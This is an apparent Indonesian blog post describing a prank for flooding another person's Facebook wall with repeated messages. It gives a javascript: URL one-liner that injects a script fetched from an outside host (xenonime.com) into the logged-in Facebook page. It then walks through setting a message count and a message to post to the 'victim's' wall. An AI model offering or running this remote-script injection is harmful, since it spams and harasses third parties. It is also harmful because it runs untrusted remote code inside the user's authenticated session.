Flooding FB Orang lain (Iseng-iseng)


pertama buka profil FB teman yg mw di isengin
liat ScreenShot:

abis itu kan misalnya URL ( addres ) temen km kan begini

Code:

http://www.facebook.com/Ricky.Sang.Pencabut.Nyawa#!/

ganti dengan script ini URL nya :

Code:

javascript:(a = (b = document).createElement("script")).src = "//xenonime.com/tools/wew.js", b.body.appendChild(a); void(0);

Liat ScreenShot nya :


isi aja 20 , jangan banyak-banyak loh nanti FBnya ditutup sama si Mark. hhe.

ntar kluar lagi kyk gini:

Code:

Masukkan pesan yg mau dikirim

masukin aja pesan yg mw km kirim ke dinding korban

klo udah kita klik ” OK ”

tgg beberapa detik 5 – 10 ,

ok coba lgsng refresh profil nya ,
Liat Hasilnya :


 

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s